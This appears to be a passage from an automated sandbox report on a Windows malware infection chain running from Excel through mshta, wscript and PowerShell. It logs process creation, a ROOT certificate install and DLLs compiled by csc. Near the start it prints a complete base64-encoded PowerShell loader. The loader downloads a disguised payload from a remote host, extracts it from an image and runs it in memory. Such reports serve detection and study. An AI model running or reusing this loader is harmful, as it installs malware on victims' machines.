RW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5djzgayy\5djzgayy.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5djzgayy\5djzgayy.cmdline"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_000007FE899C022D push eax; iretd		7_2_000007FE899C0241
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_000007FE899C00BD pushad ; iretd		7_2_000007FE899C00C1

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\5djzgayy\5djzgayy.dll			Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
